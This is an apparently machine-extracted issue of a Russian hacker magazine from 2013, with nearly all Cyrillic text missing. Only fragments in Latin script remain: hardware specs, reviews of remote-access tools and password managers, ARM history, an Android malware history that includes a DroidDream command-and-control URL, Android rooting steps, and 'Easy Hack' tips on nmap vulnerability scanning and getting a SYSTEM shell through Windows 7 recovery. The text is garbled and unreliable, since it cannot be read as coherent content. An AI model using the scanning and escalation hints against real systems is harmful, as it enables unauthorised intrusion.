USB ( ), eSATA RJ-45.
VGA, , HDMI.
NAS, N4800Eco 3,5- .

-. ThecusOS 5.0, , Flash. . .
.
. 20 . Android iOS.
- ,
-: clck.ru/8clXj.
. ,
, UPS .

NAS effect

09 /176/ 2013

39

01

:
:
:
:
:
:

02

ASUSTOR AS-604T

Buffalo LinkStation Quad

NETGEAR RND4000-200EUS

Intel Atom D2700, 2,13


DDR3, 1
2 RJ-45 (10/100/1000 /),
2 USB 3.0, 4 USB 2.0, 2 eSATA, 1 HDMI
RAID 0/1/5/6/10, JBOD
AFP, FTP, HTTP/HTTPS, iSCSI, Rsync, SSH,
SFTP, SMB/CIFS, WebDAV
, -,
, -, iTunes,
Boxee, BitTorrent, Time Machine

Marvell, 1,6
DDR3
1 RJ-45 (10/100/1000 /),
2 USB 2.0
RAID 0/1/5/10, JBOD
AFP, Bonjour, FTP/SFTP, HTTP/HTTPS, SMB/
CIFS, TCP/IP, UPnP
, -, iTunes,
BitTorrent, Time Machine, NovaBACKUP,
WebAccess
4 , 8 , 12

: Marvell, 1,6
256
1 RJ-45 (10/100/1000 /), 2 USB 3.0,
1 USB 2.0
X-RAID 2, RAID 0/1/5, JBOD
AFP, Bonjour, FTP, HTTP/HTTPS, NFS, SMB/CIFS,
UPnP, iSCSI, Telnet, SSH, SNMP, TFTP
, -,
, BitTorrent, Time Machine,
iTunes
, 2 , 4

04

:
:
:

:
:

03

05

06

QNAP TS-469 Pro

Synology DiskStation DS413j

Thecus N4800Eco

Intel Atom D2700, 2,13


DDR3, 1
2 RJ-45 (10/100/1000 /),
2 USB 3.0, 5 USB 2.0, 2 eSATA, 1 VGA,
1 HDMI
RAID 0/1/5/6/10, JBOD
CIFS/SMB, AFP, NFS, FTP, HTTP, HTTPS, Telnet,
SSH, iSCSI, SNMP, UPnP, Bonjour, WebDAV,
DLNA
, -,
, , -,
iTunes, BitTorrent, Time Machine

Marvell, 1,6
DDR3, 512
1 RJ-45 (10/100/1000 /),
2 USB 2.0
SH RAID, RAID 0/1/5/6/10, JBOD
CIFS, AFP, FTP, iSCSI, Telnet, SSH, NFS,
WebDAV, SNMP, Rsync, HTTP/HTTPS

Intel Atom D2700, 2,13


DDR3, 2
2 RJ-45 (10/100/1000 /), 2 USB 3.0,
2 USB 2.0, 1 eSATA, 1 VGA, 1 HDMI,
1 Line out
RAID 0/1/5/6/10, JBOD
SMB/CIFS, HTTP/HTTPS, FTP, TFTP, NFS, AFP,
iSCSI, Bonjour, UPnP

, -,
, Web Station, BitTorrent/
eMule, Time Backup

iTunes, , , -,
, ,
eMule

NAS

ASUSTOR AS-604T
Buffalo LinkStation Quad
NETGEAR RND4000-200EUS
QNAP TS-469 Pro
Synology DiskStation DS413j
Thecus N4800Eco


,
Intel Atom
.
Marvell.
. -
- -

. ,
Synology DiskStation DS413j. .
, Hi-End- QNAP, ASUSTOR
Thecus.

40

09 /176/ 2013

Ferrum

40

ASUS
PQ321QE
4K- ASUS

130 000
.

: 31,5
: 16:9
: 3840 2160
: 800:1
: 350 /2
: 8
: 2 2
: DisplayPort / RS232C / 3,5 Mini-Jack
: 750 489 256

802.11ac, ,
. 4K-
,
. 4K ,
,
. , , 4K . , 8,3
.
4K , .
,
AMD 7000- NVIDIA GTX
600- , 4K . ,
( E )
HDMI, DisplayPort.
Windows
8.1, .
ASUS .
31,5- 35 .


( 15 ), ( 30
) ( 45 ).

.
2 . USB-, ,
. VESA-,
.
, IGZO, . ,
45 .
, 4K-
, ASUS 350
800:1.

, PQ321QE .
. . ,
4K
.

09 /176/ 2013

PC
ZONE

41



ilembitov@real.xakep.ru


Netflix, Hulu, Pandora, Spotify
. , 810
, . ,
.


,
.
,
, , .

Spotify Pandora .
, .,
7 10
, . , . Pandora
- .

Hulu Netflix .
,
, .
on demand,
. Netflix . ,

, , .
. ,
, ,
- , .
, .

,
. Hulu , . - late night show,
Saturday Night Live Americas Got Talent,
, .
.

, , ,
.

42

PC ZONE

09 /176/ 2013

Netflix

Hulu

- Netflix DVD, . 90% , . . ,


. , . , Ivi.ru, on demand
iTunes Amazon Instant Video.

, . Hulu , , - ,
Netflix.
. , Hulu
-.
.

, , . Amazon Prime,
. , - Amazon,
Prime .

Pandora

Spotify

, . Pandora
, , . ,
, , .
,
. , Pandora
, .

Pandora , .
Spotify , , . , 20 , .
Pandora , Spotify .
. (10 )
- -.

Rdio, Google Play Music, iTunes Radio. , , (, Zvooq, Deezer). Pandora .

09 /176/ 2013

43


. ,
, .
Media Hint
(https://mediahint.com) . Firefox
Chrome.
pac- (mediahint.com/default.pac),
.
mediahint.com , , , .

DNS, ,
.
Pandora
,
Wi-Fi-
VPN.

NETFLIX
, . , . Android VPN
Google Play. TunnelBear (tunnelbear.
com). iOS ,
,
, .
iTunes .
,
. App Store, , .
iTunes .
. , ,
, .
, , . VPN IP,
DNS-. DNS , . , Wi-Fi-,
. VPN- TunnelBear,
Hideman (hideman.net) Spotflux (spotflux.com)
, .
,
DNS.
DNS-. Tunlr
(tunlr.net) Hulu, Netflix,
Unlocator (https://unlocator.com) . ,
, Unlocator Hulu ,
, , , . UnoDNS,
5 ( VPN).
, , .
.
. QIWI

Apple TV

,

Apple TV ,
.

Netflix

.

Fayve ,

(https://visa.qiwi.com). .
, QIWI,
. Google Maps,
Apple Store.

TunnelBear
VPN


DNS



.
.


Hulu Netflix


,

.
,
.
, Fan (fan.tv)
iOS, Fayve (fayve.
com) iOS Android.

, , , . , HTPC , (
).
, , Apple TV. 4500 , Hulu Netflix.
DNS,
.
.
DNS- ( ). Apple
TV. Apple ID.
. , Home Sharing
Apple- iPhone
.
, Roku.
-, , , DNS . , .
, Roku
. Google TV, .
Hulu Netflix Xbox 360 PlayStation 3. X360. IP, , . ,
, :
1. DNS.
2. .
3. .
4. Hulu Netflix.
5. , .
. , , Netflix , . , Xbox 360 Xbox Live Gold ( 240 ),
PS3 .
.
Pandora Netflix,
HD
- (
).

44

PC ZONE

09 /176/ 2013


dhsilabs@gmail.com

.
, . ,
, , , .
RADMIN (SHAREWARE)

Radmin, (www.radmin.ru) . .
: Server
Viewer.
( ),
,
.
, .
portable- Viewer, , Radmin Server 3.5 NTI ,
,
Radmin, .
:
Windows 8 32/64 bit,

Windows XP/Vista/7/8,
Wine (Radmin
Linux Wine), Telnet,
, Radmin ( ,
),
Server Viewer.
:
+ : , , .
.
+
Server,
, . , ,
.
-

,
, .
+ ,
,
AMD, , .
- Server , .
- TeamViewer
, ,
- ( 80-
) .
Radmin Server 4899, .
- .
- .

. 3.

. 1. Radmin Server

. 2. Radmin Viewer

09 /176/ 2013

45

TEAMVIEWER (FREEWARE)
, ,
TeamViewer.
. .
portable-
Windows,
, portable ,
, Radmin,
(Viewer) ,
.
TeamViewer (. 4).
,
,
, , .
, .
, ID ( 969 930 547) (8229). ,

, , ,
SMS .
. , ,
: .
, ID
( 411108007)
, -

ROYAL TS (SHAREWARE)
- mRemote.
, , mRemote
,
Royal TS (www.royalts.com/
main/home.aspx). Windows, OS X iOS (
iPhone iPad).
Royal TS
, = . Royal TS
,
, .
. shareware-

. ,

, , - (, ,
).

Radmin TeamViewer. ,
. , Radmin Server
TeamViewer, Radmin
Viewer TeamViewer . , Royal
TS - Radmin Viewer,
,

. 4. TeamViewer

. 5. TeamViewer

,
. (. 5).
,
Radmin: , , Radmin
. , . , TeamViewer (,

Run) .
, ,
,
.
, : TeamViewer Host.
, / .
TeamViewer Host ,
,
TeamViewer.

TeamViewer (
Host), , ,
( ) . ,
, ,
, .
Radmin, TeamViewer ,
,
.

. .
Royal TS ,
.
Royal TS RDP, Telnet,
SSH, Citrix, VNC.
. Linux (Ubuntu
) VNC-.
VNC-:

:
.
.
.
.
Android, iOS WP8

( 25 ).
+ .
- ,
Radmin.
- .
+
+
+
+
+
+

Royal TS, .
.

sudo apt-get install vnc4server


:

sudo vnc4server
, .
$HOME/.vnc/passwd.
vnc4server, :

. 6. Royal TS Windows

sudo vnc4server :3
Royal TS ( File),
Edit VNC.
(Display Name) :3, IP- VNC-
( 5900). .
:
+
.
+ Windows, OS X iOS.

. 7. VNC

46

PC ZONE

SUPREMO (FREEWARE)

09 /176/ 2013

.
TeamViewer
(
-
), Radmin
- ,
.

Supremo, www.
supremofree.com/index.aspx.
(. 8) TeamViewer. ,
TeamViewer, ( ID ).

Windows.
Windows, Windows 7
Windows Server 2008 R2. Windows
8 Windows Server 2012
.
: ,
ID ,
.
, . ,
TeamViewer.
, ( ).
(. 9) ,
, ID
.

(. 10) -, .
,
, .
(
, )
drag & drop.

. 8. Supremo

. 9. Supremo

. 10. Supremo

LOGMEIN (FREEWARE)

LogMeIn (. 11).
, , , . logmein.com
,
LogMeIn Free. :
Windows OS X, ,
, , ,
,
SSL/TLS, , .

,
:
,


, .

TeamViewer .
Mac
, , (.
12). logmein.com , ,
.
, ,
. : , ,
, -, ( email,
). - ( ),
- , .

, .

. ,
. (

).
.
, . ,
.

. 11. LogMeIn

. 12.

. 13.

+
+
+
+
-

+
+
+
+
-

:
, .
.
.
( HTTPS/SSL).
, Windows.
.

:
.
.
.
.
.

47

09 /176/ 2013

SSH-

ULTRAVNC/REALVNC (FREEWARE)
VNC (Virtual Network Computing)
, RFB (Remote
FrameBuffer). Windows
UltraVNC (uvnc.com) RealVNC (realvnc.com).
,
UltraVNC.
VNC, . ,
, VNC-
.
, .
RFB, VNC,
5900
5906. , VNC
, .
VNC- UltraVNC Viewer. , VNC-,
, UltraVNC Server.
,
UltraVNC Server, RoyalTS VNC-.
, . UltraVNC Edit Settings
Security
VNC-, UltraVNC Server.
UltraVNC Viewer (. 14) IP

. 14. UltraVNC Viewer

, VNC-, Connect.
:
,
.
+
Windows, OS X Linux,
,
VNC.
-

AMMYY ADMIN (FREEWARE)

ANYWHERETS (FREEWARE)

Ammyy Admin (www.ammyy.com/ru)



. ,
,
(
700 ),
, ,
.
.

AnywhereTS (anywherets.sourceforge.net) .

,
,
. AnywareTS
, , ,
.

WINDOWS 8
( , )
:
SystemPropertiesRemote.exe.

.

.
, ,
.

.


SSH. ,
? , ,
?
?
, .
Linux
Gnome Connection Manager (kuthulu.
com/gcm). ,
.
Windows AutoPuTTY SSH/Telnet- PuTTY,
: www.
r4dius.net/autoputty. SSH- OS
X Shuttle (https://github.com/fitztrev/
shuttle).
SSH-
Prompt (iOS) ConnectBot (Android).

.

INFO

. 15.


Google: Chrome
Remote Desktop,
Chrome
(bit.ly/VLleMl).


. , , ,
. ,
. ,
. dhsilabs@mail.ru.

MOSH (MOBILE
SHELL):

SSH

Mosh (mosh.mit.edu)
(

).
Mosh SSH ,

, ,
( , Wi-Fi,
IP,
). .
:
SSH- Mosh ,
Mosh. Mosh
, SSH, ,
root-. Mosh
Linux BSD, OS X, iOS
( iSSH)
Android.

GOOGLE HANGOUTS:


Google
Hangouts (google.com/+/learnmore/
hangouts/?hl=ru). ,

.

.

48

09 /176/ 2013


wronglink@gmail.com

, .
. ,
- .
, , ,
.
. ?

09 /176/ 2013


. , ,
. , ,
, -
- .
, , ,
.

1PASSWORD
agilebits.com/onepassword
Win, Mac / Android, iOS
AgileBits . ,
, . -
.

. (

),
.
,
, AES256.
: Dropbox

KEEPASS

49

keepass.info
Linux, Mac, Win / Android, iOS, Win Phone
KeePass Linux , . Windows, GPLv2,
, Linux
OS X, KeePassX.
.
(keepass.info/
download.html).

AES-256, - SHA-256. ,
, Dropbox.
, ,
Dropbox .
KeePass : /
, ,
, . (keepass.info/plugins.
html).
,
. (1 2)
, .
,
.
, , iOS. ,
.

iCloud. ,
.
portable, JS HTML,
. (help.agile.
ws/1Password3/1passwordanywhere.html).

Apple, . ,
: 50
.
Linux , Android
1Password , .

50

PC ZONE

09 /176/ 2013

DASHLANE
www.dashlane.com
Mac, Win / Android, iOS

STRIP
getstrip.com
Mac, Win / Android, iOS
Strip Zetetic. ,
, .
Windows OS X. :
Android iOS.
SQLite
AES-256
SQLCipher (sqlcipher.net). C
( : Google Drive Dropbox),
Wi-Fi.
, ( 1Password, ) : 5 ,
10.
, Strip

. , , ,
.

Linux-.

Dashlane
. , ,
( , Linux ) .
AES256.
.
Google Authenticator,
. , ,
,
- ( , ,
). .
,
.
.
-, , . , ( , -), ,
20 .

Linux , .

51

09 /176/ 2013

MY1LOGIN
https://www.my1login.com/content/index.php
Mac, Win, Linux / Android, iOS, Win Phone
My1login , - LastPass,
.
-, ,
. - :
, .
,
. ,
,
. -
, -
. .
, , . ,
. : .
, My1login

.

LASTPASS
lastpass.com
Mac, Win, Linux / Android, iOS, Win Phone
LastPass .
, , ,
. -
. , ,
.
.

AES-256
LastPass. portable, , Windows.
, (
webOS Symbian). , ,
Android ,
Dolphin.
, , . -
12 .
, . ,
.
,
, .

BLUEPASS
https://bluepass.org
Mac, Linux

Bluepass
,

:
GPLv3

;
,
- ;

;

P2P

.

, :

.

, Linux OS X.

,
100% .
60 000 (,
, ).
,
.
,
.

,
.

52

09 /176/ 2013

ARM
,


, .
, .
Intel ,


.
,

, Intel.
ARM, .
,
?
ARM Holdings 1990 , ,


: Apple Computer, Acorn Computers
VLSI Technology. Apple , Acorn VLSI
.


Acorn Sinclair Research,
ZX Spectrum.
Acorn
Sinclair Radionics ( Research).
,
1978


apismenny@gmail.com

ZX80 ( ZX Spectrum)
, .
,
. Cambridge Processor
Unit, CPU.


. ,
.

09 /176/ 2013

ARM

Acorn

MOS Technology
6502. ( ),
.
. , ,

MK14,
.
CPU ,
,
.
1979 CPU Acorn
( ),
Apple.

, Acorn System 1.
, - 80 . , ZX80,
, .
Acorn
, BBC (-,
,
)
, BBC
Micro.
,


.

,
,
.
ARM.
, -

53

Acorn System 1 ,

-
(DARPA), DARPA,
. VLSI Project :
. VLSI Very-large-scale integration
, .

,
.
,
,
, ,
, . , - ,
.

Xerox PARC
(),
. ,
DARPA , :
.
Sun Microsystems Silicon Graphics,
UNIX Berkley
Software Distribution(BSD).
, ,
.
, :


. ,

.

RISC
: CISC (Complex Instruction
Set Computing -

) RISC (Reduced Instruction Set


Computing ). , .

Intel 8080 Motorola 6800
. ,
,
.
,
.
, , , ,
. .
, , , ,
, .
. Intel, , 80- .
, ,
.
,
.
VLSI

, ,
RISC. ,
,
,
.
, :
!
,
, .

54

09 /176/ 2013

Archimedes ARM


.
RISC ,
CISC,

.
,
.
, , ,
.


, , Acorn. ZX Spectrum,
1983 : BBC Micro
,
Acorn .
MS-DOS BASIC BBC Micro,
.
Acorn
, ,
:
.
National Semiconductor,
-
:
,
.
Western Design Center,
:

, -

. : ,
? WDC ,
, .
Acorn , . , .
RISC.
ARM (Acorn
RISC Machine) 1985 , .
BBC
Master BBC Micro

.
RISC.

ARM2 :
Archimedes, 1987 . ARM2 32-
,
26 , 64 (

). ARM2
- , 1985 8
. Intel 80368 , , . 386-
ARM2. , RISC!
Archimedes
800 (

), ,
( 256 ) . ,

Macintosh
.

OLIVETTI
Archimedes Acorn,

. 1983
1984-, .

: Atari Commodore ,
Apple ( ) .
Acorn -
: -
,
, . Acorn 250 ,
.

Olivetti.
. Olivetti 1983 1985 Zilog Z8000 Intel 8088. ARM,
Archimedes RISC OS
Olivetti .
.
,
Olivetti 80
Acorn, . Acorn ,
, General Information Systems.
,
.

09 /176/ 2013

ARM

55

BBC Micro
,
ZX Spectrum

- ARM

, , :
80-
IBM PC . , PC
, , ,
.
Olivetti HP,
Palm, Android.
,
. : , IBM,

. , ,
Acorn ARM, IBM Intel . , IBM
Acorn .
.

RISC

. ,
VLSI .
VLSI
.
, (
).
Acorn, :
, ,

.
Intel ,
, ARM .
ARM
Intel AMD,
.


, Olivetti
,
ARM.

.
, ,
ARM, Acorn RISC
Machines Advanced RISC Machines.
RISC?
, ,
. Apple: 1990

Newton, ARM
.

VLSI Technologies. VLSI Project, -

ARM
IBM PC 90-
RISC . , Intel Microsoft,
x86 . : IBM Sun Microsystems,
PowerPC SPARC , ,
ARM .
, ARM Holdings
Acorn, ARM6, Newton
Apple. ARM6 1992 , 1993- .
-

ARM , 1998
. ,
, Apple :
,
ARM .
,
Apple ARM
?
ARM
. ARM
- . Intel
ARM (
XScale, 2006
).
ARM
. Apple Newton
Pocket PC , iPhone
2007 iPad 2010-.
RISC
, , Intel ARM ,
x86
.
ARM RISC
,
. ARM
(, , -
Facebook)
64- ARMv8. ARM
, . IBM,
,
, .

56

X-Mobile

08 /175/ 2013

09 /176/ 2013

57

Android
Android
2010 DEF CON 18. , Google , Google
.
Android .
,
15
Android

Android SDK 2007 .
,
SMS, , Blitz Force Massada, 30 Android, ,
API Android .
,
, . ,
, Mobile Spy Retina-X
Studios, , , , ,
.
,
2010 , ,
, .
-
2010 - Trustwave, DEF CON 18. ,
;
Linux,
write(), read(), open() close(), .
,
.

, root- HTC Legend (
), . Proof of concept, , Linux
Linux.
( ) 2010 . ,
, ,
SMS-, , , , SMS . ,
,
, .
, Trojan-SMS.AndroidOS.FakePlayer.a,
Movie Player
Windows. -

, SMS ,
.
, SMS
3353 3354,
. , , , .
SMS-.
, .

SMS .
,
,
, , .
,
, .
,
SMS, . SMS, red4life.

GEINIMI --
- Android 2010 Lookout. , Geinimi, ,
,
:
.
, , Geinimi . ,
Monkey Jump 2, President Versus Aliens, City Defense and
Baseball Superstars 2010, torrent-.
, .
. , , ( ,
DES 12345678).


execbit.ru

X-Mobile

58


Zeus

INFO


Symantec

09 /176/ 2013

.
Geinimi 20 ,
, (, ), .

Geinimi .

, :
, IMEI IMSI. (www.widifu.com, www.udaore.com, www.frijd.com ),
.
Geinimi Android,

. Geinimi ADRD, Android.Pjapps
. , torrent-, , , .
, DroidDream, 50 , Android Market.

DROIDDREAM

2011 Lompolo reddit,


Android ,

Geinimi Android,

, Superclean

Myournet. ,
, ,
, ,
rageagainstthecage root , -.

56, ( , )
Kingmall2010 we20090202.
DroidDream
Geinimi, . , (http://184.105.245.17:8080/GMServer/GMServlet)
. ,
assets/sqlite.db APK
DownloadProvidersManager.apk. , .
50
200 ,
Google
.
Android Market Security Tool, .
. Symantec
, , Fake10086
SMS 10086.
Android Market (
DroidDream ) Google ,
, 2012
Bouncer,
.
Bouncer , ,
. ,

09 /176/ 2013

59

2011 :
Android

,
.
Google, Bouncer 40% (
, ). ,
, , email-
, , ,
. , Google Bouncer (,

).

ZEUS-IN-THE-MOBILE
Zeus. , ,

;
.
Zeus
man-in-the-browser,
.
Zeus (Facebook, Yahoo!, hi5, metroFLOG,
Sonico, Netlog) , , -.
Zeus 2010
Symbian BlackBerry ,
SMS-
. 2012
Android.

-, .
,
SMS . -

Zeus Android
,
.
Zeus - , , , .

IRC-
2012 , Android
IRC-. APK- 5
Madden NFL 12.
, , , Linux, Android
root.
/data/
data/com.android.bot/files, -


Superclean.

60

X-Mobile

09 /176/ 2013

2012
Symantec
,

Android

Backdoor.AndroidOS.Obad.a

: header01.png, footer01.png, border01.png,



Gingerbreak root .
,
root ,

( , ).
root
, SMS Foncy SMS.
SIM- ,
. border01.
png, IRC-. IRC-
IP- 199.68.*.* #andros
. , , Linux-.
, Android. , , , ,
Android 2.3.


2012- Symantec , Android,
, (). ,
Android.Opfake,
-,
,
.
,
. APK-
, ,
,

.
,
, .

res/raw/data.db (
)
SMS. -,
. ,
,
.

-
, 1 2012
securelist.com , ,
Google Play. Superclean, , ,
.
1000 5000 4,5
.
, Superclean ,
Java.
, . ,
, : autorun.inf, folder.ico
svchosts.exe.

USB- , svchosts.exe. svchosts.exe Backdoor.MSIL.Ssucl.a, -

09 /176/ 2013


.

Android. , Wi-Fi, ,
,
SD-, SMS-
.

GOOGLE,

2012 Android
, Google .
-
VirusTotal, 29 Android 4.2,

Google Play
.
, Google
VirusTotal ,
, Google, , VirusTotal
Android .



Android , .
Backdoor.AndroidOS.Obad.a. , , ,
.
, ( root,
Android),
: . . Android,
, -
, , .

61

root
Wi-Fi- .

, IMEI, MAC- .

. : , ,
, , Bluetooth,
.
.
. -,
dex2jar, -
. -,
Android, Manifest.xml,
, ,
Google, . - .
, ,
, ,
( ). ,
facebook.com, -
, ( , , ).

WWW
DEF CON 18,

Android:
goo.gl/WM0tBz

reddit
DroidDream:
goo.gl/MnTcb

Android ,

Android. .

Android
.
.

?
Android , Symbian
Windows CE. 2004 29A
Symbian Series 60,
Cabir (Worm.SymbOS.Cabir). Bluetooth
,
Caribe . 29A
,
, -
, .
Windows CE Virus.
WinCE.Duts. PocketPC 2000, PocketPC
2002, PocketPC 2003,
Bluetooth MMS,
.
Cabir, 29A .

Windows CE : Backdoor.WinCE.Brador.
,
.
,
, , SMS-, .
Brador
SMS-, Symbian.

Mosquitos,
Trojan.SymbOS.Mosquit.a. -.

,
,
SODDOM BIN LOADER.

,

Symbian. , Trojan.SymbOS.Locknut,
Govno,

,
. Trojan.SymbOS.Fontal
, -
. Trojan.
SymbOS.Dampig Trojan.SymbOS.Hoblle , Trojan.SymbOS.
Drever .
iOS, . -
API
.

.
App Store. Find and call, VoIP, ,

( , ).

62

X-Mobile

08 /175/ 2013

09 /176/ 2013

63



,
, Android
, , Android-, , , Windows, .
, Google Play.

:
Google ,
(Android
SDK, adb, fastboot, ),
.
, root , ,
.
.
, , zip- .
.
, , , . ,
.

, .
, , Google .
, , zip, ,
, , , , ,

? , .
, ,
.

). , .
ClockworkMod TWRP.
! ,
,
root. root Nexus
Android. : root CyanogenMod Google .
, .


execbit.ru

?
, , . CyanogenMod
( AOKP, ParanoidAndroid
SuperVasyaAndroidModPlus) franco.kernel.
zip-. c -
( ,

CyanogenMod
OTA-

franco.updater
,

X-Mobile

64

09 /176/ 2013

ROM Manager ClockworkMod Recovery

TWRP Manager: TWRP Recovery

ROOT
- root. , , . , Android Android-.
, ,
. :
1.
, !,
USB ( Android 4.2,
).
2. USB-,
(MTP) (PTP) , .
3. iRoot (goo.gl/CwHLV) .
4. .
5. ROOT , .
iRoot root

, iRoot

Android 2.34.2.2,
Huawei, , .


SuperUser , , root,

.

RECOVERY


. ,
Recovery-Tools, ROM
Manager TWRP Manager.

, , -

: Flash Clockworkmod Recovery Flash


TWRP Recovery. . , ,
, , TWRP
, , .
, Recovery-Tools
,
, .
ROM Manager,
ClockworkMod,
. , ,
Recovery Setup ClockworkMod Recovery, .
, ,
. ,
. , .

( ,
- ).


, ,
, . , , .

GooManager. , : goo.
im.
( Gmail ),
- , ,
GooManager, , .
, , . , , - .

: Browse Compatible ROMs
(, aokp cm) Begin
Download Order & flash selected Flash. ,

09 /176/ 2013

65

GooManager

, .
.
, ,
Google : Download gapps packages
Yes Order & flash selected. , ,
Gapps ,
. (Order & flash selected)
gapps, .
TWRP
Recovery; ClockworkMod ROM Manager.
, GooManager
, .
,
, ,
( Order & flash selected)
Wipe data (factory
reset). .


, . , , . ,
,
, , , ,
, .
, Google Play.

,
, . :
franco.Kernel updater Nexus
( Samsung Galaxy Nexus, LG Nexus 4, Asus
Google Nexus 7 Samsung Nexus 10).
,
;
Trinity Kernel Toolbox
Trinity, Nexus-, Samsung Galaxy Note II Galaxy S III.
,
114 ;

CyanDelta
Android, 3

Recovery-Tools:

GLaDOS Control , , , GlaDOS (Galaxy Nexus Nexus 7).


. 81 .


. , , ,
,
GooManager. :
1. XDA (forum.xda-developers.com) 4pda (4pda.
ru), , (, ) . 510 ,
( Wi-Fi).
2. ,
Download , goomanager,
.
3. GooManager, Flash ROMs,
, Order & flash
selected, , , Flash.

, GAPPS

, , Google
; -, , .
, , Android,
. , . ?

, , ,
:

. , , , Android. Recovery-Tools, ROM
Manager TWRP Manager.
, / , Android .
.
, ,
, -

INFO
TWRP Manager


TWRP Recovery
Android:
,
,
,

X-Mobile

66

Nandroid Manager

INFO

09 /176/ 2013

Online Nandroid Backup:


. Google .
(factory reset) Google . , , ( ,
Helium Titanium Backup).

, .
,
, ,
. .
GooManager,
goo.im , .
, .
CyanogenMod ,
.
,
,
. CyanogenMod.
,
( ).
,
200 ,

.
CyanDelta, .
210 ,
. :

( ),
.


AOKP
,

,

AOKP.co.

, .
: Helium Titanium
Backup ,
Nandroid.
, ,

, , , .
Nandroid
,
Online Nandroid Backup, .
Google Play.
(, , ) ,
( ),
. ClockworkMod-
,
ClockworkMod,
Backup Mode CWM Incremental.

, - TWRP,
.
,
Quick Backup, .
,
.

Nandroid Manager.
, , , , ,
, , ,
, Wi-Fi,
, .
, -
. .


Android ,
Android.
, , . ,
- , ,
Android,
, boot-
,
.

67

09 /176/ 2013



. ( Black Hat
DEF CON). . , . ,
IT
. .



- ,
(

Microsoft, Cisco, Oracle, LPI
),
.
,
, .
IT- ,

- IT-.

,

.
H1B, , .
,
, .
,
.
, -

.
,
H1B
.
, , ,
.
, ,
,
- ,
.

, -
. ?
IT . ,
. 2013
95 000
120 000 .
:
IT- 65 000 ,

50 000.
, 75 000 ,
27 000 .
, .
25% ,
100 000
75 000 .
, .
, .

.


, ,
, .

, IT-. Win-win.


ESET

1999 -. 2003 HR- .


IT- Net2S a -C.
2006 MBA Grenoble Graduate School of
Business .
2011 ESET Russia.

68

09 /176/ 2013

EASY
HACK

GreenDog ,
Digital Security
agrrrdog@gmail.com,
twitter.com/antyurin

, NMAP

Nmap , . , .
Nmap , .
: Nmap NSE- . Nmap -

Nmap

(-
- :)). , NSE Lua, , .
SNMP ColdFusion.
, Scip AG (www.scip.ch)
NSE- vulscan. .
Nmap
( , )
: CVE, OSVBD, SecurityFocus SecurityTracker, scipvuldb.
( CVS-).
, , - .
. , false-positive.
- Mozilla , . :).
, , -
- .
.
, : scip.ch/en/?labs.20130625, vulscan.nse scripts Nmap,
scripts/vulscan. NSE, sC ( default safe ).
(scipvuldb),
.

nmap -sV --script=vulscan.nse --script-args


vulscandb=scipvuldb.csv -p465 target_ip

09/176/ 2013

Easy Hack

69

, NMAP

, ,
- .
Nmap ? ,
. - tcpwrapped ftp?, ?
(false negative) , ,
Nmap.
, . ,
, open open|filtered, ( sV ).
open|filtered ,
open. , .
, , Nmap, nmap-services nmapservice-probes. (FTP,
HTTP, DNS) . Well known , .
IANA (1024 ).
() (Service).
.
Nmap (http?, ftp?), , Nmap , /.
, - .
, , , ,
, ( ,
).
. (Probes), Nmap . ,
, ,
regexp , .
, , , (
).
( TCP) NULL.
, Nmap , 6
. , (FTP,
SMTP, SSH), .
NULL- ().
, . ,
GenericLines (\r\n\r\n).

. , UDP- NULL-
(- ).
,
. :

Nmap

Probe TCP NULL q||


match activemq m|^\0\0\0.\x01ActiveMQ\0\0\0|s p/Apache
ActiveMQ/
match ftp m|^220 3Com 3CDaemon FTP Server Version
(\d-.\w (+)\r\n| p/3Com 3CDaemon ftpd/ v/$1/
Probe TCP Help q|HELP\r\n|
match finger m|^iFinger v(\d-.\w (+)\n\n|
p/IcculusFinger/ v/$1/
match irc m|^:(-\w_. (+) 451 \*
:You have not registered\r\n$| p/IRCnet-based ircd/ h/$1/
, . (match) regexp ( Perl),
, .
. .
-, , . softmatch .
, (). , (
-) POP3.

softmatch pop3 m|^\+OK -\[\ (\(\)!,/+:<>@.\w ]+\r\n$|


(
), Nmap , (GET / HTTP/1.1, ), .
(Help\r\n, ).
nmap-service-probes. ( NULL) ,
(, ), (rarity)
. , . 1
9. 7, .

Probe TCP Hello q|EHLO\r\n|


ports 25,587,3025
rarity 8
, , , , , , fallback.
, .
NULL-. , , ,
NULL. fallback
, NULL.
. SSL-. , ( NULL), SSL-.

70

Service SSL ( ssl/


pop3). , SSL , .
, ,
. -, Nmap ,
, ,
( ports nmap-service-probes). -, Nmap
(
rarity). , . EHLO , , (7),
(SMTP 25, 587, 3025). , , - . , .
. ,
, Nmap,
. - ,
. , --version-light, 2,
, , .

09 /176/ 2013

, Nmap ,
--version-all,
. Nmap, , , , .
. (
) --version-trace, , (, ,
).
, , , tcpwrapped Version.
, , tcpwrapped *nix,
ACL . , . , tcpwrapped . ,
tcpwrapped Nmap, ,
, . , ,
, false-negative Nmap, -
NULL- 6 . .
, . , (goo.gl/a44IJu).

FLASH-

-, -. ,
. . , Adobe
ActionScript 3.
: XSS - ,
. , ( XSS), () .
.
, . :)
. . ,
, -,

. , , , ,
swfinvestigator (goo.gl/Ajhd9), . , , .
, , , SWF
, ,
. -, . , .
AS3, .
Sothink SWF Decompiler, ( ). , , , - ,
- .
, .
.
, ,
,
.

SWF

09/176/ 2013

Easy Hack

, .
. , , ,
. , SearchDiggity (goo.gl/BfCYz). ,
Google Bing,
( FOCA), ShodanHQ,
flash- regexp . : -

71

, ,
.
HP SWFScan (goo.gl/6FA1F). SWF
AS2, AS3 . SWF , .
, ( , ). , .

SearchDiggity -
SWF .

WARNING

. ,

,
.

WINDOWS

IntelComms (goo.gl/SIq97)
Windows 7 , . .
, , , ,
, : ,
, . .
, ,
. ,
(System Recovery). , (Safe mode),
. System Recovery
.
, .
Reset <Ctrl + Alt + Del>. , , :
Start Windows Normally;
Launch Startup Repair (recommended).
, .
Startup Repair, ! GUI-,
:
1. System Recovery.
2. Restore your computer using System Restore .

3. View
problem details.
4. , , , Notepad.
5. .
, ,
.
, System Recovery , -, , -, - , -, NT
AUTHORITY\SYSTEM.
? . , ,
- , ( )
cmd.exe.
? , , , . :).
, (, , ?).
-, .
, . , , . , !
. , :). Easy Hack
. :).
!

72

09
07 /176/
/174/ 2013

WARNING

.
,
,
.

, (Esage Lab)
dukebarman@xakep.ru,
@dukebarman

Java, , .
Symantec Web Gateway.

Carberp.


COREL PDF FUSION

CVSSv2:
:
:
CVE:

N/A
8 2013
Kaveh Ghaemmaghami
2013-3248

.
. ,
XPS- ZIP-,
( Windows 7zip) , .

TARGETS
Corel PDF Fusion 1.11 .

SOLUTION
Corel PDF Fusion , ,
PDF- 100 , doc, WPD, JPG, TIFF, GDF, XPS, CAD, docx PPTX.
XPS
XML Microsoft. docx,
ZIP-.
